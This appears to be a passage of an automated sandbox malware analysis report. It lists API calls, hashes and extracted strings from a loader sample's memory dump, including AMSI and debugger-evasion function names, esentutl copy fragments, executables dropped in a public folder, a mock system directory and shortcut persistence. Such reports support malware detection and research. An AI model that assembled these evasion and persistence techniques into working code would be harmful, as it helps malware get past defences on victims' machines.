                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4284456518-0
                                                                                                                  • Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                  • Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
                                                                                                                  • Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                  • Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1530111750-0
                                                                                                                  • Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                  • Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
                                                                                                                  • Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                  • Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2151042543-0
                                                                                                                  • Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                  • Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
                                                                                                                  • Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                  • Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964
                                                                                                                  APIs
                                                                                                                  • InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                    • Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                    • Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                    • Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                    • Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B
                                                                                                                    • Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                    • Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                    • Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                    • Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                    • Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                    • Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                    • Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                  • Opcode ID: 36583ab9758dabbdb91b968e4c22a5d8d4647018fd31f8616ae047bb8743ca87
                                                                                                                  • Instruction ID: 9a6282fd7272a6d13b30a3fed263af012b6cc06ab7deb173e0043bc1b8e8e5f7
                                                                                                                  • Opcode Fuzzy Hash: 36583ab9758dabbdb91b968e4c22a5d8d4647018fd31f8616ae047bb8743ca87
                                                                                                                  • Instruction Fuzzy Hash: 5A14E875A0416C8FDB11EB64DD80ACE73FAFF85304F9041E6E149EB228DA30AE959F51

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                    • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                    • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                    • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                    • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                  • Opcode ID: a15f24f87ca8209a4eb38191566a1fbacc7f49310c7b190f1f1266dea5896fda
                                                                                                                  • Instruction ID: 760498d1fe16e215b833af70e46a3420b66f908e4c86cba675ec3650dbe8bc54
                                                                                                                  • Opcode Fuzzy Hash: a15f24f87ca8209a4eb38191566a1fbacc7f49310c7b190f1f1266dea5896fda
                                                                                                                  • Instruction Fuzzy Hash: DB43FC79A0422CCFDB11EB64DD809CE73FAEF85344F9041E5E149EB228DA30AE959F51
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                    • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                    • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                    • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB
                                                                                                                    • Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                    • Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE
                                                                                                                    • Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                    • Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                    • Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                  • Opcode ID: 40373a53e75ed6e3797e6fdfc6115cfdb8379e227bcd7151bcb12cb0faf1728d
                                                                                                                  • Instruction ID: 3b8046325001ffe7cacf052f232e98a0afcbf1d8c94dbe614ebe35eb282a8c73
                                                                                                                  • Opcode Fuzzy Hash: 40373a53e75ed6e3797e6fdfc6115cfdb8379e227bcd7151bcb12cb0faf1728d
                                                                                                                  • Instruction Fuzzy Hash: 3143F875A0016D8FDB11EB64DD80ADE73B6FF85308F9041E6E109AB628DE30AE85DF51

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
                                                                                                                  • CloseHandle.KERNEL32(0000084C,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                  • String ID: )"C:\Users\Public\Libraries\yihfsboC.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                  • API String ID: 3475578485-1266785686
                                                                                                                  • Opcode ID: ef751337df298150dfe6dc4fc987bb46440e269e92c2daed5db3e0f9d9fb0c75
                                                                                                                  • Instruction ID: ee2e09baa7059692488029b4437e5f8af15874bee1075bc78e576d7dddd75aa0
                                                                                                                  • Opcode Fuzzy Hash: ef751337df298150dfe6dc4fc987bb46440e269e92c2daed5db3e0f9d9fb0c75
                                                                                                                  • Instruction Fuzzy Hash: 9722C375A0026D9FEB11FB65D881BCE73B6AF85300F9041E1A149EB254DB30EE49CF66

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
